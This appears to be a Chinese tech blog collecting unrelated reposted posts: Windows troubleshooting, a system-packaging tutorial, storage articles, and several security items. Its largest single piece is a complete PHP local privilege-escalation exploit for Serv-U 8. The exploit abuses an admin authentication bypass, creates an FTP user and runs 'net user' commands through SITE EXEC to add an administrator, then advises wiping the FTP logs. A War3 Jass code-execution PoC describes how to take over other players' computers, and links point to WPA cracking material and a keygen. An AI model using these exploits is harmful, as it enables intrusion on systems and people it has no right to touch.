redwolf在路上

Download this Media File - (Right Click)

Request 对象 错误 'ASP 0206 : 80004005'

不能调用 BinaryRead

/bbs/kp/upfile_main_bbs.asp，行 20

使用 Request.Form 集合之后，不能调用 BinaryRead。

以前可以用的，现在总是报这个错。　网上也总是说“使用 Request.Form 集合之后，不能调用 BinaryRead。
”

可是我的页面没有BinaryRead　这个啊，后来终于发现

...

删除C:\Program Files\Microsoft SQL Server这整个文件夹，regedit打开注册表删除[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server]主键删除[HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server]主键windows服务如果还在，还

@echo off
@net use x: \\server02\共享名 密码 /user:用户名
@copy bat文件名.bat "%userprofile%\「开始」菜单\程序\启动"

如：

@echo off
@net use x: \\server02\公司共享文档 12345 /user:redwolf
...

ARP病毒是局域网中的一个不可回避的话题，但是这个问题在拨号用户那儿好象没怎么听说过，现在电信或者网通的家庭用户一般都是使用PPPOE拨号的方法上网，我到亲戚家帮着调试网络的时侯就发现怎么他的机器里面IP地址与网关的地址是一致的（呵呵，象我们在局域网中调试网络习惯了，拿到一个机器先打ipconfig/all命令看看，了解一下网络的基本情况），一般来说电信或网通ADSL猫PPPOE拨号的网络拓扑如图1所示：

Download this Media File - (Right Click)

视频：动画展示未来的笔记本电脑

 Download this Media File - (Right Click)

视频：诺基亚研究中心未来愿景展示

Download this Media File - (Right Click)

视频：能够自己寻找充电器的未来概念手机

 Download this Media File - (Right Click)

视频：极具未来色彩的宝马高效动力概念车

Download this Media File - (Right Click)

 

小兵的封装工具配合深度的精简系统做教程
首先，要安装系统，这里选的是深度的精简版5.6作为封装对象
如图


驱动文件要安装上

第二步，就是要进行一些系统的优化，安装驱动，打补丁，装软件，删东西节省空间

在这里具体的优化就不讲了，因为我用的是深度的精简版系统，里面已经做过一些优化了，就不再具体去优化
在这里就只给出一些个必须进行的设置,这是我从小兵的封装教程里面复制来的
1、选用免激活的版本安装盘，正常安装系统，打补丁，优化服务
这里选用深度XP精简版5.7，安装大约需要15-20分钟。
建议关闭系统还原及自定义通知，关闭远程，关闭共享，关闭休眠
注意声卡要驱动上，否则封装后的系统都不在任务栏显示音量。
运行一次windows meida player，避免以后出现向导
安装输入法，并在“区域和语言选项”的“高级”中，应用于默认用户账户。
我的文档，如果有需要也可以移动到D盘。
outlook不能保存密码及SQL安装挂起的问题，也可以在这里清理一下相关注册表。
2、安装需要的软件
OFFICE安装时要将“第一次使用时安装”的项目完全安装上，否则会以后提示插入光盘。
不建议安装杀毒软件，特别是卡巴斯基，该软件会与某封装工具冲突。
不建议安装虚拟光驱及刻录软件，已知部分软件在封装后失效。
不建议删除windows\Installer下的安装文件，可能会造成部分程序无法卸载。
3、封装准备
运行“gpedit.msc"打开组策略
“计算机配置\管理模板\系统”
启用“关闭 Windows Update 设备驱动程序搜索”
“管理模板/系统/Internet 通信管理/Internet 通信设置”
启用“关闭 Windows Update 设备驱动程序搜索”
“用户配置\管理模板\系统”
启用“配置驱动程序搜索位置” （不搜索软盘，光驱，Windows Update）
“用户配置\管理模板\系统”
忽略“设备驱动程序的代码签名”
检查系统属性中的驱动签名是否为忽略，update是否为从不搜索。
清理Documents and Settings目录，可以清理到10M以下。
当前账户\收藏夹，安装软件后经常有链接，清之~
当前账户\SendTo，邮件接收，建议删除
当前账户\Recent，历史记录，现在删了以后还得删
当前账户\Local Settings\Temp，临时文件，能删的全删
当前账户\Local Settings\Application Data下的图标缓存IconCache.db，约5-10M
当前账户\桌面，建议将所有图标移动到All Users\桌面
这些也只是我拷来的，如果有朋友想进行详细的优化的话，请参考以下两个帖子
小兵 的 Ghost系统封装教程及封装工具原理
地在要 的 做母盘流程
不知道别人都做什么，我只是把以下几个文件夹清理一下
要先把隐藏文件设置显示

打完补丁之后


还有如果安装了输入法之后，记着一定要进行如下设置
控制面板－区域和语言选项－高级

系统安装和优化，还有装软件的过程就不细说了，咱们直接进入主题
将一干软件先放到非系统分区的一个文件夹里面，这里我用的是
小兵的封装工具 Newprep v4.7.0301
驱动选择工具 7.0正式版
深度的双核补丁
还有从GHOST V7.0里面提取的 硬件工具
以及 龙帝国的 DLLCACHE备份文件
驱动包也是从 V7.0中提取出来的，配合驱动选择工具（如果有需要可以自行更改设置）

运行 Newprep v4.7.0301

将驱动包复制到C盘根目录下

进行封装工具的高级设置，因为做这个教程，所以只用了一少部分设置

接下来检查一下C:\WINDOWS\system32\dllcache下是否有文件存在
（在我的这个系统里面有不少东西，这个是系统的DLL文件的一个备份）

如果有文件的话就把 DLL文件备份程序 复制到 C:\WINDOWS\system32\ 目录下
如果该目录是空的话，就没必要进行这一步

接下来就开始进行 IDE控制器的修改，电源模式修改 以及 全部硬件的删除
IDE控制器修改详细说明一下，电源模式修改与之类似
IDE控制器修改
在设备管理器里面，选择当前电脑的IDE控制器，单击右键，选择更新驱动程序
然后就如图所示了，要仔细看看，图上没作标示





电源模式修改


卸载全部硬件
切记 系统设置 选项里面的东西就不要去动了

硬件卸载过程中如果出现如下提示，切记不可选择是，否则重启之后硬件又会全部安装上

硬件全部卸载之后一般来说会出现 如下图所示效果

最后我们就要进行封装了



接着前面的几步，如果 C:\WINDOWS\system32\dllcache 里面有东西的话
那么现在DLL文件备份程序就派上用场了
切记一定要选择上 “恢复时自动删除自己”


最后将 驱动选择工具及配置文件 还有双核补丁 放入 C:\WINDOWS\temp下
因为在封装工具高级设置中设置的路径是这个文件夹

（可能有朋友要问了，为什么不提前放进去呢？
那是因为在小兵的封装工具会在进行系统封装的时候自动清理掉系统临时文件以及一些垃圾文件。
呵呵，这可是我的血泪经验啊，就因为这个我没弄成功了好多个）
还有硬件工具文件夹也要放到 C:\Program Files 下

最后就是要清理一下开始菜单中的最近打开文件列表

作者：空虚浪子心

发布日期：2009-08-05
更新日期：2009-08-05

受影响系统：
serv-u8

不受影响系统：
其他版本不受影响

描述：
看cnbeta发现su出8这个版本了。
想想以前写过一个7的本地提权。
不知道8有什么安全方面的更改。
下载来研究下，发现居然还是可以提权的，只是su7的那个不能直接用，稍微修改了下执行的流程。

Su8的管理平台是http的，继承了su7的方式。
抓包，分析，发现了以下路程是可以利用的。
1， 管理员从管理控制台打开web页面时，是不需要验证密码的。
2， 管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”
3， 管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。
4， 管理员添加了用户的这个包和设置权限这个包，是分开的。
所以，我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆，exec命令。达到提权。

前面su7已经说了很多，这里简单的说下好了。
.....登陆什么的。
1，获取ID。
2，给这个id添加权限。
3，给这个id赋予用户名，密码，目录，权限。
4，登陆后执行系统命令。

这段代码是不能直接当工具使用的。

<*来源：kxlzx（www.inbreak.net）
*>

测试方法：

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?/*serv-u 8 local exp ver 1.0如果你在自己的服务器上发现这个文件，厄。。。那太遗憾了，别来找我。这个文件到处都是，人人都能拿到。*/?><html><title>Serv-u 8 local exp ver 1.0</title><body><script>function fun_showDiv(show){document.getElementById(show).style.display="block";}</script><b>Serv-u 8 local exp ver 1.0</b><form id="form1" name="form1" method="post" action="?"><p><a href="#" onclick="fun_showDiv('adminpassdiv')">管理员密码</a><input type="text" name="admin_pwd" value="" /></p><p>直接提权！<input type="submit" name="cmd" value="提权" /><a href="#" onclick="fun_showDiv('QAdiv')">QA</a></p><pre><?//Global var$port=43958;$host="127.0.0.1";$sessionid="";$getuserid="";$ftpport=21;$ftpuser="lalala_hacked";$ftppwd=$_POST['admin_pwd'];$exec_addUser="site exec c:/windows/system32/net.exe user ".$ftpuser." ".$ftppwd." /add";$exec_addGroup="site exec c:/windows/system32/net.exe localgroup administrators ".$ftpuser."  /add";if($_POST['cmd']) {//login-----------------------------------------$sock_login = fsockopen($host, $port);$URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';$post_data_login['user'] = "";$post_data_login['pword'] = $ftppwd;$post_data_login['language'] = "zh%2CCN&";$ref="http://".$host.":".$port."/?Session=39893&Language=zh,CN&LocalAdmin=1";$postStr = createRequest($port,$host,$URL,$post_data_login,$sessionid,$ref);fputs($sock_login, $postStr);$result = fread($sock_login, 1280);$sessionid = getmidstr("<sessionid>","</sessionid>",$result);if ($sessionid!="")echo "登陆成功！";fclose($sock_login);//login-----------------------------------------//getOrganizationId-------------------------------$OrganizationId="";$sock_OrganizationId = fsockopen($host, $port);$URL='/Admin/ServerUsers.htm?Page=1';$postStr = createRequest($port,$host,$URL,"",$sessionid,"");fputs($sock_OrganizationId, $postStr);$resultOrganizationId="";while(!feof($sock_OrganizationId)) {$result = fread($sock_OrganizationId, 1024);$resultOrganizationId=$resultOrganizationId.$result;}$strTmp = "OrganizationUsers.xml&ID=";$OrganizationId = substr($resultOrganizationId,strpos($resultOrganizationId,$strTmp)+strlen($strTmp),strlen($strTmp)+15);$OrganizationId = substr($OrganizationId,0,strpos($OrganizationId,"\""));fclose($sock_OrganizationId);if ($OrganizationId!="")echo "获取OrganizationId".$OrganizationId."成功！";//getOrganizationId-------------------------------//getuserid---------------------------------------$getuserid="";$sock_getuserid = fsockopen($host, $port);$URL="/Admin/XML/User.xml?Command=AddObject&Object=COrganization.".$OrganizationId.".User&Temp=1&Sync=546666666666666663";$ref="http://".$host.":".$port."/Admin/ServerUsers.htm?Page=1";$post_data_getuserid="";$postStr = createRequest($port,$host,$URL,$post_data_getuserid,$sessionid,$ref);fputs($sock_getuserid, $postStr);$result = fread($sock_getuserid, 1280);$result = getmidstr("<var name=\"ObjectID\" val=\"","\" />",$result);fclose($sock_getuserid);$getuserid = $result;if ($getuserid!="")echo "获取用户ID".$getuserid."成功！";//getuserid---------------------------------------//addpower-----------------------------------------$sock_addpower = fsockopen($host, $port);$URL="/Admin/XML/Result.xml?Command=AddObject&Object=CUser.".$getuserid.".DirAccess&Sync=1227081437828";$post_data_addpower['Access'] = "7999";$post_data_addpower['MaxSize'] = "0";$post_data_addpower['Dir'] = "c:\\";$post_data_addpower['undefined'] = "undefined";$postStr = createRequest($port,$host,$URL,$post_data_addpower,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");fputs($sock_addpower, $postStr,strlen($postStr));$result = fread($sock_addpower, 1280);fclose($sock_addpower);echo "添加权限成功！";//addpower-----------------------------------------//adduser-----------------------------------------$sock_adduser = fsockopen($host, $port);$URL="/Admin/XML/Result.xml?Command=UpdateObject&Object=COrganization.".$OrganizationId.".User.".$getuserid."&Sync=1227071190250";$post_data_adduser['LoginID'] = $ftpuser;$post_data_adduser['FullName'] = "";$post_data_adduser['Password'] = 'hahaha';$post_data_adduser['ComboPasswordType'] = "%E5%B8%B8%E8%A7%84%E5%AF%86%E7%A0%81";$post_data_adduser['PasswordType'] = "0";$post_data_adduser['ComboAdminType'] = "%E6%97%A0%E6%9D%83%E9%99%90";$post_data_adduser['AdminType'] = "";$post_data_adduser['ComboHomeDir'] = "/c:";$post_data_adduser['HomeDir'] = "/c:";$post_data_adduser['ComboType'] = "%E6%B0%B8%E4%B9%85%E5%B8%90%E6%88%B7";$post_data_adduser['Type'] = "0";$post_data_adduser['ExpiresOn'] = "0";$post_data_adduser['ComboWebClientStartupMode'] = "%E6%8F%90%E7%A4%BA%E7%94%A8%E6%88%B7%E4%BD%BF%E7%94%A8%E4%BD%95%E7%A7%8D%E5%AE%A2%E6%88%B7%E7%AB%AF";$post_data_adduser['WebClientStartupMode'] = "";$post_data_adduser['LockInHomeDir'] = "0";$post_data_adduser['Enabled'] = "1";$post_data_adduser['AlwaysAllowLogin'] = "1";$post_data_adduser['Description'] = "";$post_data_adduser['IncludeRespCodesInMsgFiles'] = "";$post_data_adduser['ComboSignOnMessageFilePath'] = "";$post_data_adduser['SignOnMessageFilePath'] = "";$post_data_adduser['SignOnMessage'] = "";$post_data_adduser['SignOnMessageText'] = "";$post_data_adduser['ComboLimitType'] = "%E8%BF%9E%E6%8E%A5";$post_data_adduser['LimitType'] = "Connection";$post_data_adduser['QuotaBytes'] = "0";$post_data_adduser['Quota'] = "0";$post_data_adduser['Access'] = "7999";$post_data_adduser['MaxSize'] = "0";$post_data_adduser['Dir'] = "%25HOME%25";$postStr = createRequest($port,$host,$URL,$post_data_adduser,$sessionid,"http://127.0.0.1".":".$port."/Admin/ServerUsers.htm?Page=1");fputs($sock_adduser, $postStr,strlen($postStr));$result = fread($sock_adduser, 1280);fclose($sock_adduser);echo "添加用户成功！";//adduser-----------------------------------------//exec-------------------------------$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);$recvbuf = fgets($sock_exec, 1024);$sendbuf = "USER ".$ftpuser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = "PASS hahaha";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = $exec_addUser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fread($sock_exec, 1024);echo "执行".$exec_addUser."返回了$recvbuf";fclose($sock_exec);$sock_exec = fsockopen("127.0.0.1", $ftpport, &$errno, &$errstr, 10);$recvbuf = fgets($sock_exec, 1024);$sendbuf = "USER ".$ftpuser."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = "PASS hahaha";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fgets($sock_exec, 1024);$sendbuf = $exec_addGroup."";fputs($sock_exec, $sendbuf, strlen($sendbuf));$recvbuf = fread($sock_exec, 1024);echo "执行".$exec_addGroup."返回了$recvbuf";fclose($sock_exec);echo "好了，自己3389上去清理ftp用户日志吧！";//exec-------------------------------}/** function createRequest@port_post : administrator port $port=43958;@host_post : host $host="127.0.0.1";@URL_post : target $URL='/Web%20Client/Login.xml?Command=Login&Sync=1543543543543543';@post_data_post : arraylist $post_data['user'] = "";...@return httprequest string*/function createRequest($port_post,$host_post,$URL_post,$post_data_post,$sessionid,$referer){$data_string="";if ($post_data_post!=""){foreach($post_data_post as $key=>$value){$values[]="$key=".urlencode($value);}$data_string=implode("",$values);}$request.="POST ".$URL_post." HTTP/1.1";$request.="Host: ".$host_post."";$request.="Referer: ".$referer."";$request.="Content-type: application/x-www-form-urlencoded";$request.="Content-length: ".strlen($data_string)."";$request.="User-Agent: Serv-U";$request.="x-user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";$request.="Accept: */*";$request.="Cache-Contro: no-cache";$request.="UA-CPU: x86";if ($sessionid!=""){$request.="Cookie: Session=".$sessionid."";}$request.="";$request.=$data_string."";return $request;}//getMidfor2str copy from internetfunction getmidstr($L,$R,$str){$int_l=strpos($str,$L);$int_r=strpos($str,$R);If ($int_l>-1&&$int_l>-1){$str_put=substr($str,$int_l+strlen($L),($int_r-$int_l-strlen($L)));return $str_put;}elsereturn "没找到需要的变量";}?></pre></form><div id="adminpassdiv" style="display:none"><pre>默认为空，如果密码为空，<b>填什么都能进去。</b>如果修改过，管理员密码默认会在这里：<b>C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive</b>文件中找到一个MD5密码值。C:\Program Files\RhinoSoft.com\Serv-U是su的根目录。密码值的样式为(假设是123456)kx########################代表123456的32位MD5加密，而kx则是su对md5的密码算法改进的随机2位字符。破解后的密码为<b>kx</b>123456，去掉kx就是密码了。你可以针对这个加密生成字典。</pre></div><div id="QAdiv" style="display:none"><pre><b>提权的原理？</b>Su8的管理平台是http的，继承了su7的方式。抓包，分析，发现了以下路程是可以利用的。1，  管理员从管理控制台打开web页面时，是不需要验证密码的。2，  管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&Language=zh,CN&LocalAdmin=1”3，  管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。4，  管理员添加了用户的这个包和设置权限这个包，是分开的。所以，我可以抓包然后转换成php的socket连接post出去。最后在用经典的ftp登陆，exec命令。达到提权。前面su7已经说了很多，这里简单的说下好了。.....登陆什么的。1，获取ID。2，给这个id添加权限。3，给这个id赋予用户名，密码，目录，权限。4，登陆后执行系统命令。<b>为啥我明明显示成功了，但是却提不上去？</b>这要看错误代码了，这里偶很惭愧，并没有写详细的错误代码判断。一般有以下几种情况：1，可能是因为管理员密码不对。参照管理员密码的连接。2，可能是因为管理员限制了执行SITE EXEC。有待程序修改，程序可以加一个让他不限制的功能。3，可能是程序问题。</pre></div></body></html>

建议：
目前厂商没有任何补丁，要不大家再等等？
不过以前SU7本地溢出推出来，也没见到什么动静。-_-!
先把本地管理密码改复杂点应付着吧。
Tags: Serv-U, 提权

# 鬼仔：这个洞貌似很早以前就出了，暴雪也已经出了补丁，但是
ring04h：暴雪在1.24上，做出了修复工作，但是国内的完全全部都徘徊在1.20版，谁都不会去更新。 对于国内玩家，这个漏洞利用率能够稳定在90%上。

作者：ring04h

War3 Jass虚拟机经测试，存在严重漏洞！允许运行时动态创建并执行任意机器码
Jass属于War3为地图开发者提供的一套脚本语言，方便开发者开发或建立修改属于自己的地图。
经过推断，CS (cstrike)可能也存在此类问题。

利用方式：登陆浩方或者VS对战平台，修改某张地图(例如DOTA的地图)，开启游戏，等待其他玩家进入，开始游戏，即可执行任意机器码，控制玩家计算机。

Jass语言的用处
Jass(正确地说是Jass2)是魔兽3的脚本语言, 用于控制地图的进程和行为, 是魔兽游戏和地图的基础. 正常的地图编辑中摆放的单位(Unit), 设置的触发(Trigger)等最终都会被翻译成Jass语言存在地图文件里在游戏时被调用.

POC:

set bj_meleeTwinkedHeroes[1024] = 0x90909090
set bj_meleeTwinkedHeroes[1025] = 0x90909090 //and other bytecode giberish.
...

local code C = I2Code( code2I(function GetRandomDirectionDeg) + 0xC92D8 )

call TriggerAddAction(t, C)
call TriggerExecute(t)

//It will run whatever bytecode 90 90 90 90 means

function main takes nothing returns nothing
set t = CreateTrigger()
call TriggerAddAction(t, i2code(0x00929217) )
a[0]=0x45623512
a[1]=0x34562323
a[2]=0x62329301
...
//other thousand lines of this
...
b[0]=0x12312333
endfunction

上图：

文章标题加上了by ring04h,是说明ring04h将对以上的言论负责，其它稍后再编辑详情，上POC！

转载自网络

引用

前言：
刚买回来的本本，都只有一个分区，在有重要资料时候十分不方便，而又怕重分区破坏系统，破坏还原怎么办？不用发愁，看看Acronis Disk Director Suite这个强大的工具吧

说明：
Acronis Disk Director Suite 最新版10支持对Vista的分区操作，重定义大小，设置硬盘十分方便，它功能强大，分区快速。操作完分区后不会破坏你的原系统，也不会破坏装在OEM本本里的系统恢复程序。
当你分完区后又可以卸载它，而完全没有依赖。很好很方便的程序

工具下载：

推荐使用英文版操作，这个软件没有出中文版，中文大多是国内朋友汉化，有兴趣的朋友可以试一下，本文以英文版通用为主。方便大家参考

Acronis Disk Director Suite

迅雷下载：
http://www118.fixdown.com/Acronis.Disk.Director.Suite.rar

by:wangbin5542

引用
详细内容：
本文全部内容加载在图中，只有11部分做了详细说明：
共18张图

对上图的说明：
对于Acronis Disk Director Suite的功能进行了详细的说明

对于上图的详细说明：
11.然后在图形中的空白区点Create Partition
Partition Label:卷标（可为空）
File System:文件系统（VISTA默认为NTFS）
Create as:选择Logical Partition 存分区
Size and position：在这里当然是选择分区的大小
当然也可以在Partition Size中输入想要的大小空间

完~~~~~
BY:wangbin5542制作
本贴来自天极网群乐社区--http://q.yesky.com/group/review-17544152.html

作者：longas

现在很多朋友都在学习和研究WPA的破解及WPA PMK Hash破解，关于WPA PMK Hash的创建及使用，我已经在《无线网络安全攻防实战》一书中给出详细操作实例，并且为了给大家提供一个练手的机会，ZerOne安全团队无线安全组也在广州安全交流会上无偿提供给大家高达4.3GB的WPA PMK Hash Table DVD光盘镜像下载（大家可到Anywlan论坛或者我的Blog查看下载地址），呵呵，虽然也受到了一些莫名其妙的指责。但是作为高速破解的途径来说，从一开始，就不止Hash这一种方法，这里我要讲述的就是在未来几年内将会成为主流的破解方法---GPU运算破解。

关于GPU运算用于无线安全领域，ZerOne安全团队无线安全组已经于2008年中展开自主研发，并已取得一些成果，本文为引导更多朋友了解此类技术所写的基础工具型破解教程，望同一方向的朋友能和我联系，欢迎大家的交流。
好了话不多说，单机环境下只要配合合适的显卡，速度可以飙升到1万以上，若是性能优异的显卡可达到5万甚至更高。关于此类工具的详细安装、操作、破解、问题解答、软件下载内容我已经全部整理成基础破解教程，提供给大家下载。

文中涉及软件：Elcomsoft Wireless Security Auditor（简称为EWSA）

软件版本：v1.0.0.133版

支持系统：Windows 2000/XP/2003/Vista/2008

软件下载：http://www.elcomsoft.com/ewsa.html

--------------------------------------------------------------

详细长达11页的GPU运算破解WPA-PSK实战操作教程，下载地址如下

http://www.box.net/shared/ygjeeim9ms

GPU相关软件EWSA及注册机下载地址如下

http://www.box.net/shared/h2n1mnhgqq

转载自网络

现在服务器中存储的信息越来越多，而且也越来越重要；为防止服务器发生意外或受到意外攻击，而导致大量重要的数据丢失，服务器一般都会采用许多重要的安全保护技术来确保其安全。下面就介绍一些主要的服务器安全热点技术。
1. iSCSI技术
iSCSI技术是一种新型储存保护技术，该技术是将现有SCSI接口与以太网络(Ethernet)技术结合，使服务器可与使用IP网络的储存装置互相交换资料。该技术不仅价格较目前普遍使用的业界技术标准Fibre Channel 低廉，而且系统管理人员可以用相同的设备来管理所有的网络，并不需要以另外的设备来进行网络的管理。
iSCSI技术是由IBM下属的两大研发机构——加利福尼亚Almaden和以色列Haifa研究中心共同开发的，是一个供硬件设备使用的、可以在IP协议上层运行的SCSI指令集。简单地说，iSCSI可以实现在IP网络上运行SCSI协议，使其能够在诸如高速千兆以太网上进行路由选择。
现在，许多网络存储提供商致力于将SAN(Storage Area Network，存储区域网络)中使用的光纤通道设定为一种实用标准，但其架构需要高昂的建设成本，这不是一般的企业所能够承受的；与之相对，NAS技术虽然成本低廉，但是却受到带宽消耗的限制，无法完成大容量存储的应用，而且系统难以满足开放性的要求。iSCSI技术的使用在以上两者之间架设了一道桥梁。iSCSI技术是基于IP协议的技术标准，实现了SCSI和TCP／IP协议的连接，对于以局域网为网络环境的用户，只需要不多的投资，就可以方便、快捷地对信息和数据进行交互式传输和管理。
虽然iSCSI基于IP协议，却拥有SAN大容量集中开放式存储的品质。这一技术对于一边要面对信息高速增长，另一边却身处“数据孤岛”的众多中小企业无疑具有巨大的吸引力。
2. 全自动备份技术
该技术是在网络系统上建立起两套同样的且同步工作的文件服务器，如果其中一套出现故障，另一套将立即自动接入系统，接替发生故障的文件服务器的全部工作。通过使用该技术，可以确保容错系统的数据信息在由于系统或人为误操作造成损坏或丢失后，能及时在本地实现数据快速恢复；另外，该技术还可以确保容错系统在发生不可预料或抵御的地域性灾难（地震、火灾、机器毁坏等）时，及时在本地或异地实现数据及整个系统的灾难恢复。
3. 事务跟踪技术
该技术是针对数据库和多用户软件的需要而设计的，用以保证数据库和多用户应用软件在全部处理工作还没有结束时，或者在工作站或服务器发生突然损坏的情况下，能够保持数据的一致。其工作方式是：对指定的事务（操作）要么一次完成，要么什么操作也不进行。
4. 自动检验技术
一般来说，在对错误的或者被损坏的数据进行恢复之前，系统必须要有能力来及时发现引起这些错误的原因，所以，一个完整的容错系统应该离不开自动检验技术的支持。自动检验技术是用于故障快速检测的一种有效手段，特别是具有完全自校验性质的自校验装置，它不仅能及时检查出系统模块的差错，还能够检测出自身的差错。在设计一个容错系统时，如果正确地使用自动检验技术，可以大大提高系统对差错的反应能力，使差错的潜伏期缩短，有效地阻止错误的进一步蔓延，从而有利于其他技术功能及时对错误做出相关的纠正措施。
5. 内存纠错技术
该技术是一种服务器透明检测及故障纠错技术，它在发现并更正一个内存错误的同时，可使坏数据位从RAM上被擦除，从而有效减少无法更正的多位错误的发生。
6. 热定位技术
该技术也是一种检查数据错误的技术，该技术可以对写入磁盘的数据进行一些检查比较工作，从而确定刚刚读入的数据是否正确或者是否有其他方面的问题。在进行检修比较工作时，该技术可以自动从硬盘中把刚写入的数据读出来与内存中的原始数据进行比较。如果出现错误，则利用在硬盘内开设的一个被称为 “热定位重定区”的区，将硬盘坏区记录下来，并将已确定的坏区中的数据用原始数据写入热定位重定区中。
7. 自动重启技术
自动重启技术是指PC服务器可以在无人管理的情况下完成重新启动过程，以极快的速度恢复系统运行。
8. 网络监控技术
该技术可以让用户在一台普通的客户机上即可监测网络上所有使用的服务器，监控和判断服务器是否“健康”，一旦服务器的机箱、风扇、内存、处理器、系统信息、温度、电压或第三方硬件中的任何一项出现错误，就会报警提示管理人员。值得一提的是，监测端和服务器端之间的网络可以是局域网，也可以是广域网，直接通过网络对服务器进行启动、关闭或重新置位，极大地方便了管理和维护工作。
9. 故障的在线修复技术
故障的在线修复技术包括故障部件可带电插拔和部件的在线配置技术。可带电插拔的部件有硬盘、内存、外设插卡、电源、风扇等，目前PC服务器中值得骄傲的技术是PCI的热插拔。模块化设计将是今后的发展方向。
10. 文件分配表和目录表技术
硬盘上的文件分配表和目录表存放着文件在硬盘上的位置和文件大小等信息，如果它们出现故障，数据就会丢失或误存到其他文件中。通过提供两份同样的文件分配表和目录表，把它们存放在不同的位置，一旦某份出现故障，系统将做出提示，从而达到容错的目的。
11. VersaStor技术
该技术是康柏电脑公司在数据存储方面的力作之一，它最大的亮点是首次实现了网络存储池的概念，以消除目前广泛存在于不同存储系统之间的界限，这样就能在不同的存储系统之间进行轻松的存储和管理。另外，存储池的容量还可以根据不同服务器和应用程序动态而透明地缩放，支持不同服务器数据的无缝、透明移植。VersaStor技术能为任何一个与SAN网络连接的在线存储系统提供存储空间的获取与存放，而无须考虑生产商；而且该技术简化了存储系统的部署，对存储的管理由一般的机械劳动提升到了一个较高的级别。
12. AutoRAID技术
该技术是综合了不同RAID优点的多级RAID阵列技术，它将最近使用的数据放在按RAID 0/1存储的快速高性能的硬盘中，将不太常用的数据放在RAID5存储的经济高效的硬盘中。有了AutoRAID，系统的安装、配置和扩展变得简单而容易，该技术不再需要将数据转移到阵列中的其他硬盘上，只需将新硬盘安装好，AutoRAID就可以自动地判断硬盘大小，并将它加入硬盘阵列中；系统马上就可以利用新硬盘的空间，并将更多的数据按RAID 0/1存储，以提高系统的性能和存取速度。此外，AutoRAID能够管理由不同容量硬盘组成的硬盘阵列。